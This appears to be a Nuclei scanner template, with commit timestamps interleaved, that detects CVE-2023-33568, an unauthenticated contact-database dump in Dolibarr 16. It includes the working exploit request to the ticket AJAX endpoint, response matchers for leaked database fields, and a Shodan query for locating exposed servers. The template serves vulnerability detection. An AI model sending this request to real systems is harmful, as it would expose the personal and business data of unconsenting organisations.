2023-06-19 13:10:24 +00:00
id : CVE-2023-33568
info :
2023-06-20 09:09:55 +00:00
name : Dolibarr Unauthenticated Contacts Database Theft
2023-06-19 13:10:24 +00:00
author : DhiyaneshDK
severity : high
description : |
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
reference :
- https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
- https://nvd.nist.gov/vuln/detail/CVE-2023-33568
metadata :
max-request : 1
verified : "true"
shodan-query : http.favicon.hash:440258421
2023-06-19 18:44:40 +00:00
tags : cve,cve2023,dolibarr,unauth
2023-06-19 13:10:24 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"database_name":'
- '"database_user":'
condition : and
- type : status
status :
- 200